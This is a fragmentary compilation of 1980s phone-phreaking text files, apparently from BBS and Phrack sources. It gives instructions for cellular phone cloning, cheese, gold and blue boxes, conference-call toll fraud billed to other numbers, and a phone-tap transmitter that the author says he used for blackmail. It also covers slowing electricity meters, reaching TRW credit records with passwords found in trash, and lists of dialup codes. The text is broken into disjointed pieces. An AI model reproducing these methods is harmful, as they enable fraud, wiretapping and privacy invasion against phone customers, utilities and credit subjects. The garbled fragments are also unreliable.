well as the phone number the BO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igned to the customer.  Thereafter, whenever a phone is present in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cells, the two numbers are checked - they should be register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ame person.  If they don't match, the telco knows that an attemp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ud is taking place (or at best, some transmission error) and will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ow calls to be placed or received at that phone.  However,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ractical (especially given the present state of deregulation)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co to have records of every cellular customer of every BOC.  Ther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e going to create a fake ID/phone number combination, it will n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e "based" in an area that has a cellular system (obviously), ha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erent BOC than your local area does, and has some sort of a "roa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reement with your local BO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 can one "phreak" a cellular phone?  There are three general are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phreaking cellular phones; using one you found in an unlocked c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n unattended walk-about model), modifying your own chip set to l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different phone, or recording the phone number/ID number combin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t by other local cellular phones, and using those as your own.  M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llular phones include a crude "password" system to keep unauthoriz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ers from using the phone - however, dealers often set the pass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ually a 3 to 5 digit code) to the last four digits of the custom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bile phone number.  If you can find that somewhere on the phone, yo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luck.  If not, it shouldn't be TOO hard to hack, since most peo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n't smart enough to use something besides "1111", "1234", or what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to modify the chip set in a cellular phone you bou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tole), there are two chips (of course, this depends on the model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ufacturer, yours may be different) that will need to be changed -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alled at the manufacturer (often epoxied in) with the phone's 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and one installed by the dealer with the phone number, and possi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curity code.  To do this, you'll obviously need an EPROM bur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ll as the same sort of chips used in the phone (or a friendly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scrupulous dealer!).  As to recording the numbers of other mobil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stomers and using them; as far as I know, this is just theory... b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ms quite possible, if you've got the equipment to record and decod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ellular system would probably freak out if two phones (with va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phone number combinations) were both present in the network at o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remains to be seen what will happ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esebox Plans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Cheesebox (named for the type of box the first one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nd in) is a type of box which will, in effect, make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a Pay-Phone.....This is a simple,modernized, and eas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of doing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ide Info:These were first used by bookies many years a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a way of making calls to people without being called b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s or having their numbers traced and/or tapp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 To Make A Modern Cheese Bo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gredi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Call Forwarding service on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Set of Red Box To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number to your prefix's Intercept operator (do some scan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 this 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fter you find the number to the intercept operator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prefix, use your call-forwarding and forward all call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this will make your phone stay off the hook(actually,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aits for a quarter to be dropped in)...you now have a che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 In Order To Call Out On This Line:You must use your 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 tones and generate the quarter dropping in...then,you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phone calls to people...as far as I know, this is fair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fe, and they do not check much...Although I am not sure,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 you can even make credit-card calls from a cheese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and not get trac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START YOUR OWN CONFERENCES!      Brought to you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BART SHOWED HOW TO START A CONFERENCE CALL THRU AN 800 EXCHANGE, AND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NOW EXPLAIN HOW TO START A CONFERENCE CALL IN A MORE ORTHODOX FASHI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00 HZ. T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LY, THE FONE COMPANY HAS WHAT IS CALLED SWITCHING SYSTEMS.  THERE ARE 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AL TYPES, BUT THE ONE WE WILL CONCERN OURSELVES WITH, IS ESS (ELECTRON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SYSTEM).  IF YOUR AREA IS ZONED FOR ESS, DO NOT START A CON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VIA THE 2600 HZ. TONE, OR BELL SECURITY WILL NAIL YOUR ASS!  TO FND OUT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RE UNDER ESS, CALL YOUR LOCAL BUSINESS OFFICE, AND ASK THEM IF YOU CAN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WAITING/FORWARDING, AND IF YOU CAN, THAT MEANS THAT YOU ARE IN ESS COUN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ND CONFERENCE CALLING IS VERY, VERY DANGEROUS!!! NOW, IF YOU ARE NOT IN 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ILL NEED THE FOLLOWING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 APPLE CAT II MOD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COPY OF TSPS 2 OR CAT'S ME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TOUCH TONE FON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A TOUCH TONE FONE. (TRUE T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WITH TSPS 2, DO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N TSPS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OSE OPTION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OSE OPTION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OSE SUB-OPTION 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W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514-555-1212 (DASHES ARE NOT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WITH YOUR HANDSET, AND AS SOON AS YOU HEAR A LOUD 'CLICK', THEN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NERATE THE 2600 HZ. TONE.  THIS OBNOXIOUS TONE WILL CONTINUE FOR A F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ONDS, THEN LISTEN AGAIN AND YOU SHOULD HEAR ANOTHER LOUD 'CL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M2130801050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K' = KP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 = MULTI FREQUENCY M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 = S T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LISTEN TO THE HANDSET AGAIN, AND WAIT UNTIL YOU HEAR THE 'CLICK' AG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KM2139752975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2139751975 IS THE NUMBER TO BILL THE CONFERENCE CALL TO. NOTE: 213-97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975 IS A DISCONNECTED NUMBER, AND I STRONGLY ADVISE THAT YOU ONLY BI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TO THIS NUMBER, OR THE FONE COMPANY WILL FIND OUT, AND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BER, CONFERENCE CALLS ARE ITEMIZED, SO IF YOU DO BILL IT TO AN ENEMY'S NU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R, HE CAN EASILY FIND OUT WHO DID IT AND HE CAN BUST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ULD NOW HEAR 3 BEEPS, AND A SHORT PRE-RECORDED MESSAGE.  FROM HERE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IS ALL MENU DRIV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ERENCE CALL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THE '#'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 CALL A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6 = TRANSFER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 = HANGS UP THE CONFERENCE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 = WILL CALL A CONFERENCE OPERAT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Y AWAY FROM 7 AND 9!  IF FOR SOME REASON AN OPERATOR GETS ON-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 UP! IF YOU GET A BUSY SIGNAL AFTER KM2130801050S, THAT MEANS T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NFEREN CING LINE IS TEMPORARILY DOWN.  TRY LATER, PREFERRABLY FROM 9AM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PM WEEK DAYS, SINCE CONFERENCE CALLS ARE PRIMARILY DESIGNED FOR BUSIN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LEE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ld Box Pla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BUIL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will need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10K OHM and three 1.4K OHM resis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2N3904 transis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Photo Ce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Red LED'S (The more light produced the be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box that will not let light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and Green Wi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 from the #1 LED must shine directly on the photocell #1. The g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 I made needed the top of the LED's to touch the photo cell for i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ame applies to the #2 photo cell and L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HOTOC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     TTTT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LED-   TRANSIS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TTTT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    : :COLLEC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1--&lt;     &gt;:--: :-------:-----GREEN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ED     10K    10K   1.4K 1.4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SISTO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TOC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TTT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ANSIS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TTT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EMI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N1- --------------------------RED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4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1.4K resistor is variable and if the second part of the gold box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kipped it will still work but when someone picks up the phone they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ar a faint dial tone in the background and might report it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stapo er...(AT&am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4K will give you good reception with little risk of a Gestapo agent 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o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hat you have built it take two green wires of the same length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p the ends, twist two ends together and connect them to green1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ce a piece of tape on it with "line #1" writing on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inue the process with red1 only use red wire. Repeat with red2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n2 but change to line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INST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ill need to find two phone lines that are close together. Label on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h phone lines "Line #1". Cut the phone lines and take the outer coa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 it. Tere should be 4 wires. Cut the yellow and black wires off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p the red and green wires for both l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1 should be in two pieces. Take the green wire of one end and conn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to one of the green wires on the gold box. Take the other half of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and hook the free green wire to the green wire on the phone line. Repe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rocess with red1 and the other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you need to do now is to write down the phone numbers of the plac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oked it up at and go home and call it. You should get a dial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not, try changing the emittor with the collec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a great time with this!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istory of ESS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all the new 1960s wonders of telephone technolo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tellites, ultra modern Traffic Service Positions (TSP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s, the picturephone, and so on - the one that gave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s the most trouble, and unexpectedly became the great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velopment effort in Bell System's history, was the perf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n electronic switching system, or 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may be recalled that such a system was the specific en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ew when the project that had culminated in the invention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istor had been launched back in the 1930s. After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mplishment of that planned miracle in 1947-48, further del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brought about by financial stringency and the nee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rther development of the transistor itself. In the early 1950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abs team began serious work on electronic switching. As ear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1955, Western Electric became involved when five engine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e Hawthorne works were assigned to collaborate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s on the project. The president of AT&amp;T in 1956, wr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idently, "At Bell Labs, development of the new electron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system is going full speed ahead. We are sure this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to many improvements in service and also to gre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iciency. The first service trial will start in Morris, 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1959." Shortly thereafter, Kappel said that the cos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le project would probably be $45 mill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ut it gradually became apparent that the developement o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ercially usable electronic switching system - in effec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ized telephone exchange - presented vastly gre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cal problems than had been anticipated, and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rdingly, Bell Labs had vastly underestimated both the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investment needed to do the job. The year 1959 pas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the promised first trial at Morris, Illinois; it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ally made in November 1960, and quickly showed how much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 remained to be done. As time dragged on and costs moun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a concern at AT&amp;T and something approaching panic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 Labs. But the project had to go forward; by this tim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estment was too great to be sacrificed, and in any c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ward projections of increased demand for telephone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icated that within a phew years a time would come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the quantum leap in speed and flexibility that electron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would provide, the national network would be unabl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et the demand. In November 1963, an all-electronic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went into use at the Brown Engineering Company at Coco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ch, Florida. But this was a small installation, essenti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test installation, serving only a single comp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ppel's tone on the subject in the 1964 annual report wa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m, an almost apologetic: "Electronic switching equipment m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anufactured in volume to unprecedented standard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iability.... To turn out the equipment economically and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od speed, mass production methods must be developed; but,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ame time, there can be no loss of precision..." Another y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illions of dollars later, on May 30, 1965, the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ercial electric centeral office was put into service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casunna, New Jers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en at Succasunna, only 200 of the town's 4,300 subscri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itially had the benefit of electronic switching's added sp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dditional services, such as provision for three par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rsations and automatic transfer of incoming calls. But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ESS was on its way. In January 1966, the second commerc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allation, this one serving 2,900 telephones, went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in Chase, Maryland. By the end of 1967 there w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itional ESS offices in California, Connecticut, Minneso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rgia, New York, Florida, and Pennsylvania; by the end of 197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ere 120 offices serving 1.8 million customers; and by 197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ere 475 offices serving 5.6 million custom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difference between conventional switching and electron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is the difference between "hardware" and "softwar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rmer case, maintenence is done on the spot,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ewdriver and pliers, while in the case of electron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it can be done remotely, by computer, from a cent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nt, making it possible to have only one or two technician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ty at a time at each switching center. The development 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final figures were added up, was found to have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aggering four thousand man-years of work at Bell Labs an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cost not $45 million but $500 mill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unch Box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unch Box is a VERY simple transmitter which can be handy for all sort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It is quite small and can easily be put in a number of places. I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cessfully used it for tapping fones, getting inside info, blackmail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such things. The possibilities are endless. I will also include the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n equally small receiver for your newly made toy. Use it for just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thing. You can also make the transmitter and receiver together in on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use it as a walkie talki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you will n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9 volt battery with battery cl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25-mfd, 15 volt electrolytic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0047 mfd capaci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022 mfd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51 pf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365 pf variable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ransistor antenna c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2N366 tran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2N464 tran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100k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5.6k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10k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2meg potentiometer with SPST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good wire, solder, soldering iron, board to put it on, box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hematic for The Lunch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ay get a tad confusing but just print it out and pay atten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1 p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ase   collec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2N366       +----+------/\/\/----G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65 pf     ()              emi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ND            /  .022mf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k\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GND       +------------------------emi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2N46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0047            !          base   collec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meg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GND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ND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04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25mf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cro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00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ND----&gt;/&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witch                  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2meg po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about the schemat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GND means g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The GND near the switch and the GND by the 2meg potentiometer sh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ec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Where you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t is the transistor antenna coil with 15 turn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gular hook-up wire aroun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The middle of the loop on the left side (the left of "()") you should r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wire down to the "+" which has nothing attached to it. There is a .004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pacitor on the correct piece of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For the microphone use a magnetic earphone (1k to 2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Where you see "[!]" is the antenna. Use about 8 feet of wire to broadc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pprox 300ft. Part 15 of the FCC rules and regulation says you c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oadcast over 300 feet without a license. (Hahaha). Use more wire for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tenna for longer distances. (Attach it to the black wire on the f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e for about a 250 foot antenn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ion of the Lunch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ransmitter will send the signals over the AM radio band. You u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iable capacitor to adjust what freq. you want to use. Find a good un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q. down at the lower end of the scale and you're set. Use the 2 meg po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just gain. Just fuck with it until you get what sounds good. The switch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2meg is for turning the Lunch Box on and off. When everything is adjus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on an AM radio adjust it to where you think the signal is. Have a fri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 some shit thru the Box and tune in to it. That's all there is to i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s for a simple receiver are shown be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unch Box recei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9 volt battery with battery cl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365 pf variable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51 pf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1N38B di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ransistor antenna c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2N366 tran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SPST toggle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1k to 2k magnetic earph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hematic for recei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1 p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365 p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base  collec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ode      2N366           ear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mi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ND------&gt;/&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wi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sing state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wo devices can be built for under a total of $10.00. Not too bad. U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devices in illegal ways is your option. If you get caught, I accept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ponsibility for your actions. This can be a lot of fun if used correc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ok it up to the red wire on the phone line and it will se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rsation over the air w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jo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live Box Plans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a relatively new box, and all it basically does is serve as a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ger. You have two choices for ringers, a piezoelectric transducer (rin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standard 8 ohm speaker. The speaker has a more pleasant tone to it,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ther will do fine. This circuit can also be used in conjunction with a r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 to control an external something or other when the phone rings. Just conn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8 ohm speaker output to the inputs on the rust box, and control the po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ne it to light the light (which can be replaced by a relay for exter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olling) when the phone r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C --|-- 5      4 --|-----/\/\/-------&gt;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R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t;----)|----|-- 6      3 --|-- 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C3    |      U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7      2 --|---------- --- -- - &gt; TO RIN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8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R1      C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Main ringer TTL circ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PIN 2 &lt; - -- --- ----------| |_| |-------------&gt;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Peizoelectric transduc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PIN 2 &lt;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lt;       |S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l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lt;    |  |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lt;---------.&gt;||&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 Elctro magnetic transduc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s L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1 - Texas Instruments TCM150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 4000:8 ohm audio transfo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1 - 8 ohm spea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1 - 2.2k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2 - External variable resistor; adjusts timing frequ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1 - .47uF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2 - .1uF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3 - 10uF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1 - T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2 - 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1 and L2 are the ph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ift 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the formula for determining the shift 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R = --------------------- = ------------ = 6.25 H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SR(1/f1)+DSR(1/f2))    128     12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714    15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SR = Shift Devider Rate ratio = 12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1 = High Output Frequency = 17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2 = Low Output Frequency = 15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ron Box                 Written by The GREAT Captain Crun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I   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I   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 (C) (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I   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I   I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 =F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RE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TS L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ELECTROLYTIC CAPACITORS RATED AT 50V(LOWEST) .47U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20-30OHM 1/2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120VOLT FUSE (AMP RATING BEST TO USE AT LEAST HALF OF TOT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USE CURRENT OR EVEN LESS IT KEEPS YOU FROM BLOWING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EAKER JUST IN C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POWER CORD (CUT UP AN EXTENSTION CORD. NEED PLUG PART AND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ELECTRICALLY INSULATED BO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T OF SIF YOUR DONT FILL COMFORTABLE ABOUT ELECTRICITY THEN DO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Y WITH THIS THERE IS VOLTAGE PRESENT THAT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LL***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HING WORKS WHEN THE LOAD IN YOUR HOUSE IS LOW LIKE AT NIGHT TIM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PUT A REVERSE PHASE SIGNAL ON THE LINE AND CANCEL OUT THE OTHER PH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 REVERSE PHASE RUNNING EVERYTHING IN THE HOUSE. WELL IF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 SWITCHED THE POWER LEADS ON A D.C. (BATTERY POWERED) MOT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SEE THAT IT RUNS BACKWARDS WELL YOUR ELECTRIC METER SORT OF WO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AY...SO REVERSE PHASE MAKES THE METER SLOW DOWN AND IF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UCKY IT WILL GO BACKWARDS. ANYWAY IT MEANS A CHEAPER ELECTRIC BI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TRW Info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w is a large database in which company's and banks can run cred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cks on their customers.  Example: John Jones orders 500$ worth of ster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ment from the Joe Blow Electronic distributtng Co.  Well it could b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gave the company a phony credit card number, or doesn't have enough cred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tc.  Well they call up Trw and then run a check on him, trw then lists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 numbers (everything from sears to visa) and tells the numbers, cred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he lost it last (if he ever did) and then of course tells if he has h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prior problems paying his bi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also like to add that although Trw contains information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llions of people, not every part of the country is served, although the maj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are..  So if you hate someone and live in a small state, you probab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nt be able to order him 300 pink toilet seats from K-m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ging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log on, you dial-up your local access number (or long-distance,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 turns you on) and wait for it to say "trw" at this promt, you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ther an "A" or a "Ctrl-G" and it will say "circuit building in prog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ill wait for a minute and then clear the screen, now you will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ca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ca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nj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ga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o tell it what geographical area the customer is in, it re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esnt matter which you use, because trw will automatically switch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finds the rec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 you will type in the pswd and info on the person you are trying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credit info on:  you type it in a format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s Pswd Lname Fname ...,House number First letter of street name Zip &lt;c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 type ctrl s and 2 ctrl q's here is what it looks like in real lif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e: Dialing xxx-xxx-xxx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een cl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w ^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rcuit building in prog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use . . . screen cle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ca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c 3966785-cm5 Johnson David ...,456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 567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 ^q ^q</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it will wait for a few seconds and print out the file on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t can locate one for the gu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you may have to push return when you first connect to get the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en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Your Passwo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btain pswds, you go down to your favorite bank or sears stor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 through the trash (hence the name trashing) looking for printouts,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are a big enough place, and live in a trw area, then they will probab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some.  The printouts will have the 7 digit subscriber code, leav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4 digit pswd up to you.  Much like trashing down at good old ma b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er's Phunhouse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long awaited prequil to Phreaker's Guide has finally arri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eived from the boredom and loneliness that could only be derived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raveler!  But now, he has returned in full strength (after a sm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cation) and is here to 'World Premiere' the new files everywhere. St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ol. This is the prequil to the first one, so just relax. This is not m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e an exclusive ultra elite file, so kinda calm down and watch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ground if you are too cool for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hreak Diction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re you will find some of the basic but necessary terms that sh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n by any phreak who wants to be respected at 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eak  : 1. The action of using mischevious and mostly illeg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ays in order to not pay for some sort of te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unications bill, order, transfer, or other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often involves usage of highly illegal boxe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chines in order to defeat the security that is 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p to avoid this sort of happening. [fr'eaking]. v.</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A person who uses the above methods of destructio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aos in order to make a better life for all.  A tr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eaker will not not go against his fellows or nar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 people who have ragged on him or do an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rmed to be dishonorable to phreaks. [fr'eek]. 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 certain code or dialup useful in the action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ing a phreak. (Example: "I hacked a new metr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eak last ni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System: 1. There are 3 main switching systems currently employ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the US, and a few other systems will be mentio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 back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SxS: This system was invented in 1918 and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mployed in over half of the country until 1978.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s a very basic system that is a general wast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ergy and hard work on the linesman. A good wa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dentify this is that it requires a coin in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oth before it will give you a dial tone, or that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ll waiting, call forwarding, or any other s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rvice is available.  Stands for: Step by Ste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XB: This switching system was first employed in 197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order to take care of most of the faults of Sx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witching.  Not only is it more efficient, b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so can support different services in various for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B1 is Crossbar Version 1. That is very limite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s hard to distinguish from SxS except by direct vi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wiring involved. Next up was XB4, Crossb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 4. With this system, some of the basic th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ke DTMF that were not available with SxS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omplished. For the final stroke of XB, XB5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reated. This is a service that can allow DTMF pl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st 800 type services (which were not alw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vailable.) Stands for: Crossb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 ESS: A nightmare in telecom. In vivid color, ES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pretty bad thing to have to stand up to.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quite simple to identify. Dialing 911 for emergenc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ANI [see ANI below] are the most common facet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dread system. ESS has the capability to list i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son's caller log what number was called, how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call took, and even the status of the convers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dem or otherwise.) Since ESS has been employ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ich has been very recently, it has gone throu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ny kinds of revisions. The latest system to dat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SS 11a, that is employed in Washington D.C.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curity reasons. ESS is truly trouble for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eak, because it is 'smarter' than the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ystems. For instance, if on your caller log they sa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0 calls to 1-800-421-9438, they would be able to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CN/A [see Loopholes below] on your numb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termine whether you are subscribed to that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not. This makes most calls a hazard, beca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hough 800 numbers appear to be free,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corded on your caller log and then right befor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ceive your bill it deletes the billings for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ut before that the are open to inspection, which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e reason why extended use of any code is danger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nder ESS. Some of the boxes [see Boxing below]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nable to function in ESS.  It is generally a men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the true phreak. Stands For: Electronic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ystem. Because they could appear on a fil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mewhere or maybe it is just nice to know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ywa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SSS: Strowger Switching System.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n-operator system avail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WES: Western Electronics Switching. Used about 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ears ago with some minor places out w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xing:  1) The use of personally designed boxes that emit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ncel electronical impulses that allow simpl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ting while phreaking. Through the use of sepa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xes, you can accomplish most feats possible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without the control of an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Some boxes and their functions are listed be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es marked with '*' indicate that they are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peratable in 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lack Box: Makes it seem to the phone company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hone was never picked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lue Box  : Emits a 2600hz tone that allows you to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ch things as stack a trunk line, k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operator off line, and oth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d Box : Simulates the noise of a quarter, nick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dime being dropped into a pay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eese Box : Turns your home phone into a pay phon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row off traces (a red box is usu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eded in order to call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lear Box : Gives you a dial tone on some of the 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xS payphones without putting in a co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ige Box : A simpler produced linesman's handset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lows you to tap into phone line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tract by eavesdropping, or cros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res,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urple Box : Makes all calls made out from your h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em to be local ca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I [ANI]: 1) Automatic Number Identification. A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vailable on ESS that allows a phone service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lups below] to record the number that any cer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de was dialed from along with the number that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lled and print both of these on the customer b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50 dialups [see Dialups below] are all desig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ust to use ANI. Some of the services do not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roper equipment to read the ANI impulses y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ut it is impossible to see which is which with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ing busted or not busted fi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ups [dy'l'ups]: 1) Any local or 800 extended outlet that allows ins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ess to any service such as MCI, Sprint, or AT&a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at from there can be used by handpicking or u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program to reveal other peoples codes which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n be used moderately until they find out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and you must switch to another code (preferrab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fore they find out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Dialups are extremely common on both senses.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lups reveal the company that operates them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on as you hear the tone. Others are much har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some you may never be able to identify.  A sm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st of dialu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00-421-9438 (5 digit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00-547-6754 (6 digit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00-345-0008 (6 digit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00-734-3478 (6 digit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00-222-2255 (5 digit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Codes: Codes are very easily accessed proced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en you call a dialup. They will give you some s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one.  If the tone does not end in 3 seco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n punch in the code and immediately follow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de, the number you are dialing but strik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in the beginning out first. If the tone d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 then punch in the code when the tone e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n, it will give you another tone.  Punch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umber you are dialing, or a '9'. If you punch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9' and the tone stops, then you messed up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ttle. If you punch in a tone and the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tinues, then simply dial then number you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lling without the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All codes are not universal. The only type that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know of that is truly universal is Metro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most every major city has a local Metro dial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 Philadelphia, (215)351-0100/0126) and sinc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des are universal, almost every phreak has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m once or twice. They do not employ ANI in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utlets that I know of, so feel free to che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rough your books and call 555-1212 or, as a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vious manor, subscribe yourself. Then, never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r own code. That way, if they check up on you d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your caller log, they can usually find out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are subscribed.  Not only that but you could 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phreak hacker around that area and just le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ck away, since they usually group them, and, a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nus, you will have their local dial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950's. They seem like a perfectly cool phreak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eam. They are free from your house, from payph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everywhere, and they host all of the major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tance companies (950)1044 &lt;MCI&gt;, 950)107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rint&gt;, 950-1088 &lt;S+ylines&gt;, 950-1033 &lt;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lecom&gt;.) Well, they aren't. They were designe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I. That is the point, end of discu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phreak dictionary. If you remember all of the things contained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fileup there, you may have a better chance of doing whatever it i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This next section is maybe a little more intere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se are some blue box plans, but first, be warned, there have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00hz tone detectors out on operator trunk lines since XB4. The idea beh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to use a 2600hz tone for a few very naughty functions that can re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your day lighten up. But first, here are the plans, or the hear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  :   1   :   2   :   4   :   7   :  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00  :   +   :   3   :   5   :   8   :  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00 :   +   :   +   :   6   :   9   :  K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00 :   +   :   +   :   +   :  10   :  KP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500 :   +   :   +   :   +   :   +   :  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700   : 900   :1100   :1300   :15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op! Before you diehard users start piecing those little tone tidb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gether, there is a simpler method. If you have an Apple-Cat wit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like Cat's Meow IV, then you can generate the necessary ton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00hz tone, the KP tone, the KP2 tone, and the ST tone through the d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So if you have that I will assume you can boot it up and it wo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do you the favor of telling you and the other users what to do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lue box now that you have somehow constructed it. The connection to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is one of the most well known and used ways of having fun with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 You simply dial a TSPS (Traffic Service Positioning Station,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perator you get when you dial '0') and blow a 2600hz tone throug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Watch out! Do not dial this direct! After you have done that,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te simple to have fun with it. Blow a KP tone to start a call, a ST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top it, and a 2600hz tone to hang up. Once you have connected to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some fun numbers to call with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00-456-1000  Teleconference (free, because you are th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a code)-101 Toll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a code)-121 Local Operator (he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a code)-131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a code)-141 Rate &amp; Ro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a code)-181 Coin Refund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a code)-11511 Conference operator (when you dial 800-544-636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ll, those were the tone matrix controllers for the blue box and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helpful stuff to help you to start out with. But those are onl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s with the operator. There are other k-fun things you can do with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advanced Blue Box Stu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ops. Small mistake up there. I forgot tone lengths. Um, you blow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ne pair out for up to 1/10 of a second with another 1/10 second for sil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the digits. KP tones should be sent for 2/10 of a second. One wa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use the 2600hz traps is to send pink noise over the channel (for all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hat have decent BSR equalizers, there is major pink noise in t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ing the operator functions is the use of the 'inward' trunk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is working it from the inside. From the 'outward' trunk, you can do s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as make emergency breakthrough calls, tap into lines, busy all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s in any trunk (called 'stacking'), enable or disable the TSPS'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some 4a systems you can even re-route calls to any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l right. The one thing that every complete phreak guide sh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is blue box plans, since they were once a vital part of phrea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thing that every complete file needs is a complete listing of all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800 numbers around so you can have some more Fu7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800 Dialup List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345-0008 (6)   1-800-547-6754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245-4890 (4)   1-800-327-9136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526-5305 (8)   1-800-858-9000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437-9895 (7)   1-800-245-7508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343-1844 (4)   1-800-322-1415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00-437-3478 (6)   1-800-325-7222 (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l right, set Cat Hacker 1.0 on those numbers and have a fuck o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y. That is enough with 800 codes, by the time this gets around to you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nno what state those codes will be in, but try them all out anyway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what you get. On some 800 services now, they have an operator who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swer and ask you for your code, and then your name. Some will switch b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forth between voice and tone verification, you can never be quite s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you will be upagain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med with this knowledge you should be having a pretty good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ing now. But class isn't over yet, there are still a couple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s that you should know. If you hear continual clicking on the line,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uld assume that an operator is messing with something, maybe e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ing in on you. It is a good idea to call someone back when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s doing that. If you were using a code, use a different code and/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to call him ba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good way to detect if a code has gone bad or not is to listen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umber has been dialed. If the code is bad you will probably hea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ringing more clearly and more quickly than if you were using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erent code.  If someone answers voice to it then you can immedia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ume that it is an operative for whatever company you are using. The fam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1311' code for Metro is one of those. You would have to be quite stup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ctually respond, because whoever you ask for the operator will alw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He's not in right now, can I have him call you back?' and then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ask for your name and phone number. Some of the more sophistic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ies will actually give you a carrier on a line that is suppos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you a carrier and then just have garbage flow across the screen lik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with a bad connection. That is a feeble effort to make you think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de is still working and maybe get you to dial someone's voice, a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 for the carrier trick is to dial anumber that will give you a carr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you have never dialed with that code before, that will allow you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rmine whether the code is good or not. For our next section, a ligh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 at some of the things that a phreak should not be without. A vocabul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w months ago, it was a quite strange world for the modem people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But now, a phreaker's vocabulary is essential if you wanna mak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od impression on people when you post what you know about certain subj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Vocabul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o not misspell except certain excep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ne -&gt; f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eak -&gt; phrea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ever substitute 'z's for 's's. (i.e. codez -&gt;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ever leave many characters after a post (i.e. Hey Du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EVER use the 'k' prefix (k-kool, k-rad, k-whate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o not abbreviate. (I got lotsa wares w/ do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ever substitute '0' for 'o' (r0dent, l0z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Forget about ye old upper case, it looks ruggy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l right, that was to relieve the tension of what is being dri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your minds at the moment.  Now, however, back to the teaching cour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somethings you should know about phones and billings for ph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TA: Local Access Transference Area. Some people who live in l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ties or areas may be plagued by this problem. For instance, let's say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ve in the 215 area code under the 542 prefix (Ambler, Fort Washington).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nt to dial in a basic Metro code from that area, for in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51-0100, that might not be counted under unlimited local calling becaus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out of your LATA.  For some LATA's, you have to dial a '1' witho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code before you can dial the phone number. That could prove a hass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us all if you didn't realize you would be billed for that sort of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at way, sometimes, it is better to be safe than sorry and phrea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Caller Log: In ESS regions, for every household around,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has something on you called a Caller Log. This shows every sing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that you dialed, and things can be arranged so it showed every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as calling to you. That's one main disadvantage of ESS, it is mos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ized so a number scan could be done like that quite easily. Using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up is an easy way to screw that, and is something worth remembe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ways, with the caller log, they check up and see what you dialed. H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ialed 15 different 800 numbers that month. Soon they find that you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cribed to none of those companies. But that is not the only thing. M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would imagine "But wait! 800 numbers don't show up on my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ll!". To those people, it is a nice thought, but 800 numbers are picked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caller log until right before they are sent off to you. So they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ck right up on you before they send it away and can note the fact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fucked up slightly and called one too many 800 l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ight now, after all of that, you should have a pretty good idea of h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row up as a good phreak. Follow these guidelines, don't show off,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take unnecessary risks when phreaking or hack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ts to Pee Wee for this file taken from his 'Hell Disk'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ack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olume Three, Issue 27, File 3 of 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lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&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Introduction to MIDNET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Chapter Seven Of The Future Transcendent Saga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A More Indepth Look Into NSFnet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National Science Foundation Network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Presented by Knight Lightning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June 16, 1989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lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&lt;&gt;&l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log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are not already familiar with NSFnet, I would suggest that you re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ntiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13), and defini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SFnet:  National Science Foundation Network" (Phrack Inc., Volume Th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ssue 26, File 4 of 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Of Cont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DOD Protocol Su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ames and Addresses In A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elnet (*NOT* Tele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File Trans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DNET is a regional computer network that is part of the NSFnet, the Na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ence Foundation Network.  Currently, eleven mid-United States univers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connected to each other and to the NSFnet via MID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A  - University of Arkansas at Fayettevil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U - Iowa State University at A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I  - University of Iowa at Iowa C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SU - Kansas State University at Manhatt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U  - University of Kansas at Law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MC - University of Missouri at Columb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U  - Washington University at St. Louis, Missou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 - University of Nebraska at Lincol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SU - Oklahoma State University at Still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T  - University of Tulsa (Oklahom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  - University of Oklahoma at Norm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earchers at any of these universities that have funded grants can acces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x supercomputer centers funded by the NS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hn Von Neuman Supercomputer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ional Center for Atmospheric Resear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nell National Supercomputer Fac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ional Center for Supercomputing Appli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ttsburgh Supercomputing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n Diego Supercomputing Cen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ddition, researchers and scientists can communicate with each other over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st world-wide computer network that includes the NSFnet, ARPAnet, CS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Tnet, and others that you have read about in The Future Transcendent Sag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refer to "Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of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more detai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Dnet is just one of several regional computer networks that compri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SFnet system.  Although all of these regional computer networks work the s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Dnet is the only one that I have direct access to and so this file is writt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a MIDnet point of view.  For people who have access to the other reg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s of NSFnet, the only real differences depicted in this file that w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apply to the other regional networks are the universities that are ser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MIDnet as opposed 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YSERnet  in New York St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Anet   in the southeastern United St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QSUInet in Tex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RRnet   in the San Francisco are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RIT     in Michig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re are others that are currently being construc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regional networks all hook into the NSFnet backbone, which is a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connects the six supercomputer centers.  For example, a person at Kans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te University can connect with a supercomputer via MIDnet and the NSF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bone.  That researcher can also send mail to colleagues at the Univers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Delaware by using MIDnet, NSFnet and SURAnet.  Each university has its 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l computer network which connects on-campus computers as well as provi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eans to connecting to a regional ne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universities are already connected to older networks such as CSne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PAnet and BITnet.  In principal, any campus connected to any of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s can access anyone else in any other network since there are gatew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the networ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teways are specialized computers that forward network traffic, there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ng networks.  In practice, these wide-area networks use differ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ing technology which make it impossible to provide full functiona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ross the gateways.  However, mail is almost universally supported across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teways, so that a person at a BITnet site can send mail messages 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league at an ARPAnet site (or anywhere else for that matter).  You sh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ready be somewhat familiar with this, but if not refer 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mbo To Infinity" (Phrack Inc., Volume Two, Issue 24, File 3 of 13)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et Domains" (Phrack Inc., Volume Three, Issue 26, File 8 of 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networks rely on hardware and software that allow computer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e.  The language that enables network communication is calle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ocol.  There are many different protocols in use today.  MIDnet us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CP/IP protocols, also known as the DOD (Department of Defense) Protocol Su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networks that use TCP/IP include ARPAnet, CSnet and the NSFnet.  In fa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 regional networks that are linked to the NSFnet backbone are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use TCP/IP.  At the local campus level, TCP/IP is often used, although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ocols such as IBM's SNA and DEC's DECnet are common.  In ord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e with a computer via  MIDnet and the NSFnet, a computer at a camp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t use TCP/IP directly or use a gateway that will translate its protoco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TCP/I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ternet is a world-wide computer network that is the conglomeration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of the large wide area networks, including ARPAnet, CSnet, NSFnet, a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onals, such as MIDnet.  To a lesser degree, other networks such as BIT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can send mail to hosts on these networks are included as par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et.  This huge network of networks, the Internet, as you have by now r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about in the pages of Phrack Inc., is a rapidly growing and very compl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ity that allows sophisticated communication between scientists, 